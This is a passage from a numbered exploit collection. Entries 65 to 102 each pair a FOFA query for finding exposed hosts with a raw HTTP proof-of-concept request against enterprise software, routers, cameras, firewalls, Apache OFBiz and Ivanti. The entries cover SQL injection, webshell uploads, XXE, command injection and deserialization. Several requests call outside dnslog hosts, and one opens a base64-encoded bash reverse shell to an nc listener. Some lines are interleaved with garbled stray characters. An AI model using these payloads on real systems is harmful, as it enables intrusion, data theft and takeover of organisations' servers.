65. 优卡特脸爱云一脸通智慧管理平台 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 was created successfully.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. 万户ezOFFICE协同管理平台 SendFileCheckTemplateEdit SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is present.

67. 万户ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
The newdocId and filename parameters give the name of the written file, the dir parameter gives the path it is written to, and the fileType parameter gives the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is served at /defaultroot/platform/portal/layout/apoxkq.jsp

68. 万户ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. 万户 ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户ezEIP success command execution
FOFA: app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远OA getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA: icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

" Q- F; o; j4 D" `7 N4 r0 @% b( p75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE! \6 {( I1 `& `3 _1 g$ P
FOFA:app="TELESQUARE-TLR-2005KSH"
: q# \1 P; L+ kGET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
- }% y- P% w" ?) I% |; m& LHost: x.x.x.x" \7 V& K0 _$ Q8 ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36# V8 x( E0 e$ u5 x7 F
Connection: close
* ]. w/ s7 ~+ |, H6 HAccept: */*6 _0 g- E8 i$ J# L) E' O
Accept-Language: en
5 ]2 Q; u* k# w$ V7 L  gAccept-Encoding: gzip
$ k0 u) b! z/ d3 Q! E! }  L+ ]6 E3 P
' t/ s4 ]8 b( M3 O5 W0 q
GET /cgi-bin/test28256.txt HTTP/1.12 s: c" ]/ s+ G
Host: x.x.x.x: d! V2 ~; }" m3 ]7 `0 n8 `
" Z# b5 V9 V- N6 ~- Y; f. O
* r8 \8 W6 J( j7 |) n5 K+ Z& R
76. 新开普掌上校园服务管理平台 service.action remote command execution
FOFA: title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
  "command": "GetFZinfo",
  "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
  ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

8 h" b1 |. p8 ^& k/ n7 N* b78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
; \3 T  y2 c, M1 X2 {FOFA:icon_hash="2001627082"
6 a7 ~4 y; a0 u. V* l2 {  N5 APOST /Platform/System/FileUpload.ashx HTTP/1.1
% F5 j; |. U8 t$ u; QHost: x.x.x.x
4 X0 K! G' v5 x3 iUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
6 j0 r7 x" A0 I/ ?4 k1 g3 _/ \Connection: close
7 K7 M1 ~) Y) {6 ]+ t4 QContent-Length: 336
: P. {" K$ ?$ A. S  pAccept-Encoding: gzip" ~% M+ b) I7 G
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l8 \; Q8 a" ]( B/ O/ |! y% D7 A1 g

% p1 _! |' W5 t% e5 p4 ]------YsOxWxSvj1KyZow1PTsh98fdu6l
+ K) V: ~4 H# M2 i) rContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
! j6 N- v& T( R7 P. eContent-Type: image/png2 X9 ^# ?- y" ]6 E7 X2 G" q
+ y7 O$ L* T2 G7 ~
YsOxWxSvj1KyZow1PTsh98fdu6l2 o% ~9 H' d+ L  i/ i9 `
------YsOxWxSvj1KyZow1PTsh98fdu6l( x  P$ [# v; g& R% j- a4 p
Content-Disposition: form-data; name="target"/ m1 J+ T( A2 O* S) q1 a

: c% @' _  H8 u% Y( j/ B/Applications/SkillDevelopAndEHS/
% K6 u& X( p0 H# m3 J. v------YsOxWxSvj1KyZow1PTsh98fdu6l--
6 [8 N6 b  c, V  k
4 p" O7 r* h2 K# e: q( s$ n2 K9 g
5 W. Y* N2 _' Y5 S3 P5 pGET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1! h4 U% w  G1 n, k6 l' V6 a
Host: x.x.x.x
6 o/ r7 R8 i6 S7 J* c, v( B0 c1 W
# U. P  S9 O' ~- r4 q6 X# H0 e/ z' @- H, c/ \/ i. t
79. BYTEVALUE 百为流控路由器 remote command execution
FOFA: BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀软件 DesignReportSave.jsp arbitrary file upload
FOFA: app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
  "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
  "type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA: body="sysaid-logo-dark-green.png"
The exploit request is as follows; it drops a Godzilla (哥斯拉) webshell.
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Result URL: http://x.x.x.x/userfiles/index.jsp

86. tosei (Japan) self-service laundry machine RCE
FOFA: body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御安全网关 aaa_local_web_preview file upload
FOFA: title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
FOFA: title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联FE协作办公平台 editflow_manager SQL injection
FOFA: title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视IP网络对讲广播系统 3.0.3_20201113_RELEASE remote command execution
FOFA: icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
FOFA: title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视运行管理中心 session command execution
Fastjson command execution
hunter: web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神SecGate3600防火墙 app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qi An Xin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/cciytdzu.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36


95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>


Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"


Substitute the generated payload into the PoC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);


Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B


99. Ncast Yingkeshi HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--


101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip


102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
      <ds:SignedInfo>
        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>
        <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
      </ds:SignedInfo>
      <<ds:SignatureValue>qwerty</ds:SignatureValue>
